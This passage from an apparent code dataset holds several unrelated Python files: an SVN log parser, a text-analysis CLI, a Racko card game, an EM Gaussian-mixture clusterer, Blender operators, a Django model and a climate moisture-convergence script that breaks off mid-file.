details[1].strip()\r\n current_commit.date = details[2].strip()\r\n current_commit.comment_line_count = int(details[3].strip().split(' ')[0])\r\n current_commit.changes = data[index+2:data.index('',index+1)]\r\n #print(current_commit.changes)\r\n index = data.index(sep, index + 1)\r\n current_commit.comment = data[index-current_commit.comment_line_count:index]\r\n commits.append(current_commit)\r\n except IndexError:\r\n 
break\r\n\r\n#print(len(commits))\r\n\r\n\r\n#commits.reverse()\r\n\r\n#for index, commit in enumerate(commits):\r\n   # print(commit.get_commit_comment()\r\n\r\n\r\ndef read_file(changes_file):\r\n    # use strip to strip out spaces and trim the line.\r\n    data = [line.strip() for line in open(changes_file, 'r')]\r\n    return data\r\n\r\ndef get_commits(data):\r\n    sep = 72*'-'\r\n    commits = []\r\n    current_commit = None\r\n    index = 0\r\n    while index < len(data):\r\n        try:\r\n            # parsing each of the commits and putting them into a list of commits\r\n            details = data[index + 1].split('|')\r\n            # with spaces at end removed.\r\n            commit = {'revision': details[0].strip(),\r\n                      'author': details[1].strip(),\r\n                      'date': details[2].strip(),\r\n                      'number_of_lines': details[3].strip().split(' ')[0]\r\n                      }\r\n            # add details to the list of commits.\r\n            commits.append(commit)\r\n            index = data.index(sep, index + 1)\r\n        except IndexError:\r\n            break\r\n    return commits\r\n\t\r\ndef get_authors(data):\r\n    sep = 72*'-'\r\n    authors = {}\r\n    current_commit = None\r\n    index = 0\r\n    while index < len(data):\r\n        try:\r\n            # parse each of the authors and count their commits in a dictionary\r\n            author = data[index + 1].split('|')[1].strip()\r\n            if author in authors:\r\n                authors[author] = authors[author] + 1\r\n            else: \r\n                authors[author] = 1\r\n            index = data.index(sep, index + 1)\r\n        except IndexError:\r\n            break\r\n    return authors\r\n\t\r\ndef get_date(data):\r\n    sep = 72*'-'\r\n    dates = []\r\n    current_commit = None\r\n    index = 0\r\n    while index < len(data):\r\n        try:\r\n            # parse each of the dates and put them into a list of dates\r\n            date = data[index + 1].split('|')[2].strip()\r\n            dates.append(date)\r\n            index = data.index(sep, index + 1) \r\n        except IndexError:\r\n            break\r\n    return dates \r\n\r\n    \r\nif __name__ == '__main__':\r\n    # open the file - and read all of the lines.\r\n    changes_file = 'changes_python.txt'\r\n    data = read_file(changes_file)\r\n    commits = get_commits(data)\r\n\r\n    # print the number of lines read\r\n    #print(len(data))\r\n    #print(commits)\r\n    #print(commits[0])\r\n    print(commits[1]['author'])\r\n    print(commits[2]['author'])\r\n    print(commits[3]['author'])\r\n    print(len(commits[0]['author']))\r\n    \r\n\r\n    \r\n    #print(len(commits))\r\n    #print(len(commits[0]['author']))\r\n    #print(len(commits[0]['date']))\r\n   # print get_date(data)\r\n    #print len(get_date(data))\r\n","sub_path":"simple.py","file_name":"simple.py","file_ext":"py","file_size_in_byte":4425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"259718387","text":"import re\n\nimport functions\n\n\ndef inputs(path_to='file'):\n    way_to_file = str(\n        input('Please enter the path to the ' + path_to + ': ')).lower()\n    propertys = str(input('Please write properties: ')).lower().split()\n    return(way_to_file, propertys)\n\n\ndef help_me():\n    help_text = \"\"\"If you are using this for the first time, enter $download\nCommands:\n    $help - show this help\n    $download - install the nltk components\n    $analysis m - analyze a single file\n    $analysis p - analyze a single file in parts\n    $analysis f - analyze all files in a folder\n    $analysis pf - analyze all files in a folder in parts\nYou may be asked to enter additional information, for example a file path, or to choose modifiers.\nOptions:\n    '-f' - save to a file (analysis m or analysis f)\n    '-s' - change the number of sentences in a block (analysis p or analysis pf)\nAnalyzed properties (analysis p or analysis pf):\n    '-ld' - lexical diversity\n    '-mw' - mean word length\n    '-ms' - mean sentence length\n    '-cs' - commas per 1000 characters\n\"\"\"\n    print(help_text)\n\n\ndef analysis_propertys(propertys, kwargs):\n    if '-f' in propertys and 'in_file' in kwargs.keys():\n        kwargs['in_file'] = True\n    if '-n' in propertys and 'new' in kwargs.keys():\n        kwargs['new'] = True\n    if 'file_name' in kwargs.keys():\n        file_name = str(input('Please write file name: '))\n        if '.' not in file_name:\n            file_name = file_name + '.csv'\n        kwargs['file_name'] = file_name\n    if '-s' in propertys and 'sentences_in_block' in kwargs.keys():\n        kwargs['sentences_in_block'] = int(input(\n            'Please write number of sentences in block: '))\n    if '-c' in propertys and 'check_author' in kwargs.keys() and 'author' in kwargs.keys():\n        kwargs['check_author'] = True\n        kwargs['author'][0] = str(input('Please write author name: '))\n        kwargs['author'][1] = str(input('Please write author surname: '))\n\n\ndef return_analysis_view():\n    way_to_file, propertys = inputs()\n    kwargs = {'in_file': False,\n              'file_name': 'default.csv',\n              'new': True}\n    analysis_propertys(propertys, kwargs)\n    print('Please wait...')\n    functions.return_analysis(way_to_file, **kwargs)\n\n\ndef return_analysis_parts_view():\n    way_to_file, propertys = inputs()\n    kwargs = {'sentences_in_block': 150}\n    analysis_propertys(propertys, kwargs)\n    print('Please be patient...')\n    functions.return_analysis_parts(way_to_file, **kwargs)\n\n\ndef return_analysis_folder_view():\n    way_to_file, propertys = inputs(path_to='folder')\n    kwargs = {'check_author': False,\n              'author': ['name', 'surname'],\n              'in_file': False,\n              'file_name': 'default.csv',\n              'new': True}\n    analysis_propertys(propertys, kwargs)\n    print('Please wait...')\n    functions.return_analysis_folder(way_to_file, **kwargs)\n\n\ndef return_analysis_parts_folder_view():\n    way_to_file, propertys = inputs(path_to='folder')\n    kwargs = {\n        'sentences_in_block': 150,\n        'check_author': False,\n        'author': ['name', 'surname'],\n        'prop': 0\n    }\n    props = {'-ld': 0,\n             '-mw': 1,\n             '-ms': 2,\n             '-cs': 3}\n    analysis_propertys(propertys, kwargs)\n    p = input('Please enter the property to analyze: ')\n    if p in props.keys():\n        kwargs['prop'] = props[p]\n    print('Keep calm...')\n    functions.return_analysis_parts_folder(way_to_file, **kwargs)\n\n\nCOMMANDS = {\n    'analysis m': return_analysis_view,\n    'analysis p': return_analysis_parts_view,\n    'analysis f': return_analysis_folder_view,\n    'analysis pf': return_analysis_parts_folder_view,\n    'help': help_me,\n    'download': functions.textanalyzerlib.punkt_download\n}\n\nif __name__ == '__main__':\n    help_me()\n    while True:\n        command = input()\n        if command in COMMANDS.keys():\n            try:\n                COMMANDS[command]()\n            except Exception:\n                print('FAILED')\n        elif command.lower() == 'exit':\n            break\n        else:\n            print('No such command exists yet')\n","sub_path":"main/start.py","file_name":"start.py","file_ext":"py","file_size_in_byte":4792,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"463776360","text":"#!/usr/bin/env python3\ndef gen_combinations(collection_size, items_size, position=0, low=0, subset=None, operation=None):\n    \"\"\"\n    Enumerates all the possible combinations of items_size from a collection of collection_size\n    Each enumeration is 0-indexed and every element in subset corresponds to item_no + 1 in collection\n    Example:\n        collection_size : 5\n        items_size: 3\n        one possible combination is subset : [ 0, 1, 2]\n        this 
corresponds to 1st, 2nd and 3rd element in collection\n    About operation:\n        operation is a function which carries out the user's desired operation on every generated\n        combination; it may return True to stop the enumeration early\n        this allows complete decoupling of this function from the use of the combination enumeration (better unit testing)\n    Required parameters:\n        collection_size and items_size\n    \"\"\"\n    if collection_size < 0 or items_size < 0:\n        raise ValueError('collection size and item size must be positive.')\n    if items_size > collection_size:\n        raise ValueError('item size must be less than or equal to collection size')\n    if collection_size == items_size == 0:\n        return\n    if subset is None:\n        subset = [-1] * items_size\n    if operation is None:\n        def operation(subset):\n            print(subset)\n            return False\n    high = ((collection_size - 1) - items_size) + (position + 1)\n    for i in range(low, high + 1):\n        subset[position] = i\n        if position == items_size - 1:\n            done = operation(subset)\n            if done:\n                break\n        else:\n            gen_combinations(collection_size, items_size, position + 1, low=i + 1, subset=subset, operation=operation)\n\n\ndef calculate_distance(lat1, lon1, lat2, lon2):\n    \"\"\"\n    Calculates and returns the great circle distance in km between two points\n    on the earth.\n    \"\"\"\n    from math import radians, cos, sin, asin, sqrt\n    # degrees to radians\n    lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])\n\n    # haversine formula\n    dlon = lon2 - lon1\n    dlat = lat2 - lat1\n    a = sin(dlat / 2) ** 2 + cos(lat1) * cos(lat2) * sin(dlon / 2) ** 2\n    c = 2 * asin(sqrt(a))\n    r = 6371 # Radius of earth in kilometers\n    return c * r\n\n\ndef get_data_from_json(file_path=None):\n    \"\"\"\n    requires a file which contains one JSON string per line\n    all types of errors are silenced so that if this function fails, nothing else stops because of this.\n    \"\"\"\n    if not file_path:\n        import os\n        file_path = os.path.dirname(os.path.abspath(__file__)) + '/friends.json'\n    import json\n    try:\n        data_file = open(file_path, mode='r')\n    except Exception as error:\n        # print(error)\n        return []\n    friends = []\n    for line in data_file:\n        try:\n            friends.append(json.loads(line))\n        except Exception:\n            data_file.close()\n            return []\n    data_file.close()\n    return friends\n","sub_path":"adwyze/utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":2937,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"248250665","text":"import bpy\n\n\nclass LookThroughSelected(bpy.types.Operator):\n    bl_idname = 'scene.look_through_selected'\n    bl_label = 'Look through selected'\n    bl_description = 'Look Through selected light, camera or object'\n\n    @classmethod\n    def poll(cls, context):\n        return context.object\n\n    def execute(self, context):\n        # remember the render camera so it can be restored after the operator call\n        active_camera = context.scene.camera\n        context.space_data.lock_camera_and_layers = False # Needs to be False\n        # to activate the local camera\n        bpy.ops.view3d.object_as_camera()\n        context.scene.camera = active_camera # restore render camera\n        return {'FINISHED'}\n\n\nclass LookThroughRender(bpy.types.Operator):\n    bl_idname = 'scene.look_through_render'\n    bl_label = 'Look through render'\n    bl_description = (\n        'Look Through render camera, could be different than the local camera')\n\n    def execute(self, context):\n        active_camera = bpy.context.scene.camera\n        context.space_data.camera = active_camera\n        bpy.ops.view3d.viewnumpad(type='CAMERA')\n        
return {'FINISHED'}\n","sub_path":"scripts/addons/custom_tools/look_through.py","file_name":"look_through.py","file_ext":"py","file_size_in_byte":1013,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"94195144","text":"# Time Complexity : O(m*n)\n# Space Complexity : O(1)\n# Did this code successfully run on Leetcode : Yes\n# Any problem you faced while coding this : No\n\nclass Solution:\n    def spiralOrder(self, matrix: List[List[int]]) -> List[int]:\n        res = []\n        if len(matrix) == 0 or len(matrix[0]) == 0:\n            return res\n        \n        top = 0\n        bottom = len(matrix)-1\n        left = 0 \n        right = len(matrix[0])-1\n        size = len(matrix) * len(matrix[0])\n        \n        while len(res) < size:\n            # top row\n            for i in range(left, right+1):\n                if len(res) < size:\n                    res.append(matrix[top][i])\n            top += 1\n            \n            # right column\n            for i in range(top, bottom+1):\n                if len(res) < size:\n                    res.append(matrix[i][right])\n            right -= 1\n            # bottom row\n            for i in range(right, left-1, -1):\n                if len(res) < size:\n                    res.append(matrix[bottom][i])\n            bottom -= 1\n            # left column\n            for i in range(bottom, top-1, -1):\n                if len(res) < size:\n                    res.append(matrix[i][left])\n            left += 1\n        \n        return res\n","sub_path":"sprial_travel.py","file_name":"sprial_travel.py","file_ext":"py","file_size_in_byte":1257,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"220199383","text":"import os\nimport sys\nimport glob\nfrom collections import Counter\n\nimport torch\n\ncurrent_path = os.getcwd()\nsys.path.append(current_path)\nfrom nslt.models.model_saver import load_checkpoint\n\n\nsave_dir = \"save\"\nexp = \"gloss-lstm2\"\nmode = \"valid\"\nstep = 8000\nckpt_path = f\"{save_dir}/{exp}/checkpoints/ckpt_{step:08d}.pt\"\nresult_file = f\"{save_dir}/{exp}/results/{mode}_pred_{step:08d}.txt\"\nassert os.path.exists(result_file)\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\nwith open(result_file, \"r\") as f:\n    data = f.readlines()\n\ncounter = Counter()\n\nfor line in data:\n    word_list = line[:-1].split(\" \")\n    counter.update(word_list)\n\nprint(len(counter))\n\nconfig, vocab, model, optim = load_checkpoint(ckpt_path, device, use_fields=False)\n\nprint(model)\n","sub_path":"runs/check_checkpoint_model.py","file_name":"check_checkpoint_model.py","file_ext":"py","file_size_in_byte":778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"12552151","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models\nfrom django.contrib.auth.models import User\n\n# Create your models here.\n\nclass Comentario(models.Model):\n    usuario = models.ForeignKey(User,on_delete=models.CASCADE)\n    descricao = models.TextField()\n    date = models.DateTimeField(auto_now_add=True)\n    aprovado = models.BooleanField(default=False)\n\n    def __str__(self):\n        return self.usuario.username\n","sub_path":"comment/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"557679869","text":"'''\nProgram: CS 115 Project 3: Racko!\nAuthor: Christian Esperon\nDescription: Racko is a card game in which the user must try to achieve a hand of cards in\n             ascending order before the computer does. First to do so achieves a Racko and\n             wins the game.\n'''\n\n#Define a global variable to denote the total number of cards.\n#In the actual game, this will be equal to 60 but for testing we 
use smaller numbers\nnumCards = 9 #9, 12, 60\n\n#Define a global variable to denote the size of rack (number of cards in user's hand).\n#In the actual game, this will be equal to 10 but for testing we use smaller numbers\nrackSize = 3 #3, 4, 10\n\nimport sys\nimport random\n\ndef get_top_card(cards):\n    \"\"\"\n    Gets the top card from any given deck.\n\n    Parameter: deck (a list of cards)\n    Returns: top card from deck\n    \"\"\"\n    top_card = cards.pop()\n    return top_card\n\ndef add_card_to_discard(card,discard):\n    \"\"\"\n    Adds a card to the discard pile.\n\n    Parameter: unwanted card; discard pile\n    Returns: nothing\n    \"\"\"\n\n    discard.append(card)\n\n\ndef find_and_replace(newcard,card2br,hand, discard):\n    \"\"\"\n    Adds newcard to hand and places the unwanted card into the discard pile.\n\n    Parameter: desired card; card to be replaced; hand; discard pile\n    Returns: nothing\n    \"\"\"\n\n\n    for i in range (len(hand)):\n        if hand[i] == card2br:\n            hand[i]= newcard\n            add_card_to_discard(card2br,discard)\n\ndef shuffle(card_stack):\n    \"\"\"\n    Shuffles any given deck\n\n    Parameter: List(deck of cards)\n    Returns: nothing\n    \"\"\"\n\n    random.shuffle(card_stack)\n\n\ndef deal_initial_hands(deck):\n    \"\"\"\n    Deals out two hands of cards.\n\n    Parameter: List(deck)\n    Returns: Two lists which represent the two card hands\n    \"\"\"\n\n    hand1=[]\n    hand2=[]\n    top_card_user = get_top_card(deck)\n    hand1.append(top_card_user)\n    top_card_user2=get_top_card(deck)\n    hand2.append(top_card_user2)\n\n    while (len(hand1)) < rackSize and (len(hand2)) < rackSize :\n\n        top_card_user = get_top_card(deck)\n        hand1.append(top_card_user)\n        top_card_user2= get_top_card(deck)\n        hand2.append(top_card_user2)\n\n\n    return hand1,hand2\n\ndef check_racko(hand):\n    \"\"\"\n    Verifies if the given hand is a sorted list.\n\n    Parameter: hand of cards\n    Returns: True or False\n    \"\"\"\n\n    return sorted(hand) == hand\n\ndef replaceDeck(card_stack):\n    \"\"\"\n    Takes the discard pile and shuffles it, that then becomes the new deck\n    and the top card from the new deck becomes the discard pile.\n    Parameter: List of numbers in discard pile\n    Returns: two lists: the new deck and the new discard pile\n    \"\"\"\n\n    shuffle(card_stack)\n    discard_pile=[]\n\n    discard_pile.append(card_stack.pop())\n\n\n    return discard_pile,card_stack\n\ndef computer_play(computer_hand, deck, discard):\n\n    #Define a variable to specify the numbers that can be \"allotted\" to a single card in the rack\n    div = numCards // rackSize\n\n    #print lists corresponding to deck, discard pile and computer's current hand\n    print('deck:')\n    print(deck)\n    print('discard pile:')\n    print(discard)\n    print()\n    print(\"Computer's current hand:\")\n    print(computer_hand)\n\n\n\n    #randomly decide whether to choose from the discard pile or deck\n    #coin = random.random() #import random for this to work\n    coin = random.random()\n    if coin > 0.5:\n        # Show the discard card\n        discard_card = get_top_card(discard)\n        #Choose a card to kick out\n        #First determine index where discard_card should be inserted.\n        #Estimate it by dividing the discard card by the numbers per rack (div)\n        print(\"Computer: Chooses top discard card \" + str(discard_card))\n        loc = (discard_card - 1) // div\n\n        #Replace by whatever card is in computer's hand at this index\n        number_of_card = computer_hand[loc]\n        print(\"Computer: Replacing it with \" + str(number_of_card))\n\n        #Modify the discard pile and the computer's hand\n        find_and_replace(discard_card,computer_hand[loc],computer_hand,discard)\n\n        print(\"Computer's new hand: \")\n        
print(computer_hand)\n print()\n\n\n else:\n # Pick the top card from deck and print it out\n deck_card = get_top_card(deck)\n print(\"Computer: Chooses top card from the deck \" + str(deck_card))\n\n coin = random.random()\n #Randomly decide whether to keep the deck card or not\n if coin > 0.5:\n # Choose a card to kick out\n # First determine index where deck card should be inserted.\n print(\"Computer: Chooses top deck card \" + str(deck_card))\n\n loc = (deck_card - 1) // div\n # Replace by whatever card is in computer's hand at this index\n number_of_card = computer_hand[loc]\n print(\"Computer: Replacing it with \" + str(number_of_card))\n\n #Modify the discard pile and the computer's hand\n find_and_replace(deck_card,computer_hand[loc],computer_hand,discard)\n print(\"Computer's new hand is:\")\n print(computer_hand)\n print()\n else:\n print(\"Computer: Rejects top deck card \" + str(deck_card))\n\n #Add card to discard pile\n add_card_to_discard(deck_card,discard)\n print(\"Computer's new hand is:\")\n print(computer_hand)\n print()\n\ndef human_play(human_hand, deck, discard_pile):\n # print lists corresponding to deck, discard pile and user hand\n print('deck:')\n print(deck)\n print('discard pile:')\n print(discard_pile)\n print('Your current hand:')\n print(human_hand)\n\n # Retrieve the top card in the discard pile and ask user if they want it\n top_discard = get_top_card(discard_pile)\n print('Do you want this discard card:', top_discard)\n answer = str(input('Enter yes or no:'))\n\n if answer.lower() == 'yes':\n # Ask the user for the card (number) they want to kick out\n card_2_BR = int(input('Enter the number of the card you want to kick out:'))\n # Modify the user's hand and the discard pile\n find_and_replace(top_discard, card_2_BR, human_hand, discard_pile)\n\n # Print the user's hand\n print('Your new hand is:')\n print(human_hand)\n print()\n elif answer.lower() == 'no':\n add_card_to_discard(top_discard, discard_pile)\n # Get the top card from deck and print it to show the user what they got\n topcard_deck = get_top_card(deck)\n print('The card you get from the deck is', topcard_deck)\n # Ask the user if they want this card\n second_choice = input(\"Do you want to keep this card? 
Enter yes or no: \")\n        if second_choice.lower() == 'yes':\n            # Ask the user for the card (number) they want to kick out\n            card_2_KO = int(input('Enter the number of the card you want to kick out:'))\n            # Modify the user's hand and the discard pile\n            find_and_replace(topcard_deck, card_2_KO, human_hand, discard_pile)\n            # Print the user's hand\n            print('Your new hand is:')\n            print(human_hand)\n            print()\n        else:\n            # Add card to discard pile\n            add_card_to_discard(topcard_deck, discard_pile)\n\n            # Print the user's hand\n            print('Your new hand is:')\n            print(human_hand)\n            print()\n    else:\n        print(\"Choice can only be yes or no.\")\n        sys.exit()\n\n\ndef main():\n    random.seed(26)\n    # Create a list of integers that represents the deck.\n    # This should be numbers from 1 to numCards (see definition of numCards above)\n    deck= []\n    for i in range (1,numCards+1):\n\n        deck.append(i)\n\n\n    # shuffle the deck\n    shuffle(deck)\n\n    # deal initial hands\n    # deal_initial_hands returns two hands: one for the computer and one for the human\n\n    computer_hand, human_hand= deal_initial_hands(deck)\n    # create an empty discard pile\n\n    discard_pile=[]\n\n    # Take out top card from the deck to begin the discard pile\n    top_card= get_top_card(deck)\n    add_card_to_discard(top_card,discard_pile)\n\n    while check_racko(human_hand)!=True and check_racko(computer_hand)!=True:\n\n        if check_racko(computer_hand)== False:\n            human_play(human_hand,deck,discard_pile)\n\n            if len(deck) == 0:\n                print(\" \\nUser: WOAH! Deck is empty. Shuffling discard pile and using that as the new deck.\")\n                # Call replaceDeck to get the lists corresponding to the new deck and discard pile\n                discard_pile, deck = replaceDeck(discard_pile)\n\n\n        if check_racko(human_hand)== False:\n            computer_play(computer_hand,deck,discard_pile)\n\n            if len(deck) == 0:\n                print(\" \\nComputer: WOAH! Deck is empty. Shuffling discard pile and using that as the new deck.\\n\")\n                # Call replaceDeck to get the lists corresponding to the new deck and discard pile\n                discard_pile, deck=replaceDeck(discard_pile)\n    # Outside the while loop. We have a winner. Declare the winner along with the winner's hand.\n\n    if check_racko(human_hand)== True:\n        print('HUMAN WINS! with hand of',human_hand)\n    else:\n        print('COMPUTER WINS! 
with hand of', computer_hand)\n\n\nmain()","sub_path":"cs115-Programming I/Project 3/project3.py","file_name":"project3.py","file_ext":"py","file_size_in_byte":9304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"224412397","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom IPython.display import display, clear_output\nimport time\nfrom scipy import stats\nfrom helper import *\nfrom kmeans import *\nfrom scipy.stats import multivariate_normal as mvn\n\n\ndef _em_expectation(X, pi, mu, var):\n N, P = X.shape\n K = len(pi)\n q = np.zeros((K, N))\n for k in range(K):\n for n in range(N):\n gdist = mvn.pdf(X[n], mu[k], var[k])\n q[k, n] = pi[k]*gdist\n acc = np.sum(q, axis=0)\n for k in range(K): \n q[k, :] /= acc\n return q\n\n\n\ndef em_fit(X, *params):\n pzx = _em_expectation(X, *params)\n Y = np.argmax(pzx, axis=0)\n return Y\n\n\ndef complete_likelihood(X, pi, mu, var):\n q = _em_expectation(X, pi, mu, var)\n return np.sum(np.log(q))\n\n\n\ndef _em_maximisation(X, K, q, isotropic=False):\n N, P = X.shape\n mu = np.zeros((K, P))\n var = np.zeros((K, P, P))\n pi = np.zeros(K)\n sum_q = np.sum(q, axis=1)\n \n for k in range(K):\n mu[k] = np.average(X, axis=0, weights=q[k])\n pi[k] = np.mean(q[k])\n if isotropic:\n norm = np.diag((X-mu[k]).dot((X-mu[k]).T))\n v = np.sum(q[k]*norm)/(P*np.sum(q[k])) \n var[k, ...] = v * np.eye(P)\n else:\n sk = np.zeros((P, P))\n for i in range(N):\n diff = X[i] - mu[k]\n sk += diff.reshape(P,1).dot(diff.reshape(1,P))*q[k,i]\n var[k, ...] = sk/sum_q[k]\n return pi, mu, var\n \n\ndef _estimate_params(X, Y, K):\n N, P = X.shape\n mu = np.zeros((K, P))\n Yold = np.zeros(N)\n var = np.zeros((K, P, P))\n pi = np.zeros(K)\n for k in range(K):\n Xk = X[Y == k]\n Nk = len(Xk)\n pi[k] = Nk/N\n mu[k, :] = np.mean(Xk, axis=0)\n var[k, ...] 
= np.cov(Xk.T)\n return pi, mu, var\n\n\ndef em_train(X, K, vis=\"all\", max_iter=100, isotropic=False):\n N, P = X.shape\n Yold = np.zeros(N)\n colors = np.array([(0.9, 0, 0), (0, 0.9, 0), (0, 0, 0.9), (0.5, 0.5, 0.5)], dtype=float)\n llikehood = []\n \n # initialisation\n Y, _ = kmeans(X, K, vis=\"none\", max_iter=100, plusplus=True)\n pi, mu, var = _estimate_params(X, Y, K)\n \n n = 0\n while (Y - Yold).any() != 0 and n < max_iter: \n n += 1\n Yold = Y.copy()\n \n # expectation\n q = _em_expectation(X, pi, mu, var)\n \n # maximization\n pi, mu, var = _em_maximisation(X, K, q, isotropic=isotropic)\n \n # clustering\n Y = em_fit(X, pi, mu, var)\n \n # plotting\n if vis == \"all\":\n plot_em(X, pi, mu, var, colors, n)\n \n # likelihood\n llikehood.append(complete_likelihood(X, pi, mu, var))\n \n return pi, mu, var, llikehood\n\n\n\n\ndef plot_em(X, pi, mu, var, colors, n=-1):\n K = len(pi)\n N, P = X.shape\n plt.cla()\n ax = plt.gca()\n plt.axis('equal')\n pzx = _em_expectation(X, pi, mu, var)\n c = pzx.T.dot(colors[:K])\n# for i in range(N):\n plt.scatter(X[:,0], X[:,1], color=c, s=1)\n for k in range(K):\n plt.plot(mu[k,0], mu[k,1], \"k*\")\n plot_ellipse(mu[k], var[k], ax,alpha=0.3, color=colors[k])\n plt.grid()\n plt.draw()\n if n > 0:\n plt.title(f\"EM at step {n}\")\n time.sleep(0.1)\n display(plt.gcf(), display_id=True)\n clear_output(wait=True)","sub_path":"ProbabilisticGraphicalModel/Homework3/em.py","file_name":"em.py","file_ext":"py","file_size_in_byte":3339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"39573790","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\"\"\"\norig: 00_scripts/12_00_convergence_PUB.py\ndescription\t Investigate diurnal cycle of convergence of moisture over\n Alpine Region. 
\nauthor\t\t\tChristoph Heim\ndate created 28.05.2019\ndate changed 02.03.2020\nusage\t\t\tno args\nnotes\t\t\tFigure 11 in paper.\n==============================================================================\n\"\"\"\nimport os, time, pickle, copy\nimport xarray as xr\nimport numpy as np\nfrom datetime import time as dttime\nfrom datetime import datetime,timedelta\nos.chdir('00_scripts/')\nfrom package.utilities import dt64_to_dt, Timer, calc_mean_diurnal_cycle\nimport matplotlib.pyplot as plt\n\ndef unstaggering(field):\n if 'srlon' in field.dims:\n field = field.rename({'srlon':'rlon'})\n field.coords['rlon'].values += np.mean(\n np.diff(field.coords['rlon'].values))/2\n if 'srlat' in field.dims:\n field = field.rename({'srlat':'rlat'})\n field.coords['rlat'].values += np.mean(\n np.diff(field.coords['rlat'].values))/2\n field.coords['rlon'].values = np.round(field.coords['rlon'].values,3)\n field.coords['rlat'].values = np.round(field.coords['rlat'].values,3)\n return(field)\n\n \nif __name__ == '__main__':\n ####################### NAMELIST INPUTS FILES #######################\n i_recompute_1 = 0\n i_recompute_2 = 0\n plot_path = os.path.join('..','00_plots', '14_convergence')\n resolutions = ['4', '2', '1']\n #resolutions = ['4']\n member_types = ['RAW', 'SM']\n\n\n dx = {'4':4400,'2':2200,'1':1100}\n\n inp_path = os.path.join('..','02_fields', 'topocut')\n #inp_path_diurnal = os.path.join('..','02_fields', 'diurnal')\n\n fluxes = {\n 'W':{'field':'zU','dir': 1,'mean':'rlon','mean_ind': 0,'sum':'rlat',}, \n 'E':{'field':'zU','dir':-1,'mean':'rlon','mean_ind':-1,'sum':'rlat',}, \n 'S':{'field':'zV','dir': 1,'mean':'rlat','mean_ind': 0,'sum':'rlon',}, \n 'N':{'field':'zV','dir':-1,'mean':'rlat','mean_ind':-1,'sum':'rlon',}, \n }\n\n\n start_time = datetime(2006,7,11,0)\n end_time = datetime(2006,7,20,0)\n\n #start_time = datetime(2006,7,12,0)\n #end_time = datetime(2006,7,14,0)\n\n\n dom_alpine_region = {\n 'code':'alpine_region',\n 'label':'Alpine Region',\n #'rlon':(-3.76,3.68),\n #'rlat':(-3.44,1.08),}\n 'rlon':(-3.775, 3.705),\n 'rlat':(-3.455, 1.105),\n 'altitudes':slice(0,2500),}\n dom_northern_italy_0_2 = {\n 'code':'northern_italy_0_2',\n 'label':'Northern Italy 0-2km',\n 'rlon':(-1.695, 0.225),\n 'rlat':(-2.495,-1.215),\n 'altitudes':slice(0,2000),}\n dom_northern_italy_2_6 = {\n 'code':'northern_italy_2_6',\n 'label':'Northern Italy 2-6km',\n 'rlon':(-1.695, 0.225),\n 'rlat':(-2.495,-1.215),\n 'altitudes':slice(2000,6000),}\n dom_alpine_ridge_15_25 = {\n 'code':'alpine_ridge_15_25',\n 'label':'Alpine Ridge 1.5-2.5km',\n 'rlon':(-1.375, 0.225),\n 'rlat':(-0.695,-0.295),\n #'rlon':(-1.78, 0.625),\n #'rlat':(-1.095,0.095),\n 'altitudes':slice(1500,2500),}\n\n #domain = dom_northern_italy_0_2\n #domain = dom_northern_italy_2_6\n #domain = dom_alpine_region\n domain = dom_alpine_ridge_15_25\n\n time_chunk = 1\n\n pickle_save_file = 'data_12_00/data_12_00_{}.pkl'.format(domain['code'])\n pickle_save_file_2 = 'data_12_00/data_12_00_{}_2.pkl'.format(domain['code'])\n pickle_save_file_3 = 'data_12_00/data_12_00_{}_3.pkl'.format(domain['code'])\n pickle_save_file_4 = 'data_12_00/data_12_00_{}_4.pkl'.format(domain['code'])\n\n ######PLOTTING\n i_plot = 0\n i_save_fig = 0\n\n plot_flux = 'TOT'\n #plot_flux = 'E'\n #plot_flux = 'W'\n #plot_flux = 'S'\n #plot_flux = 'N'\n\n mem_keys = ['SM', 'RAW', 'DIFF']\n mem_labels = ['SM', 'RAW', 'RAW - SM']\n #y_labels = [r'Lateral Vapor Convergence $[mm$ $h^{-1}]$',\n # r'Surface Pressure Anomalies $[Pa]$',\n # r'Temperature Anomalies $[K]$']\n 
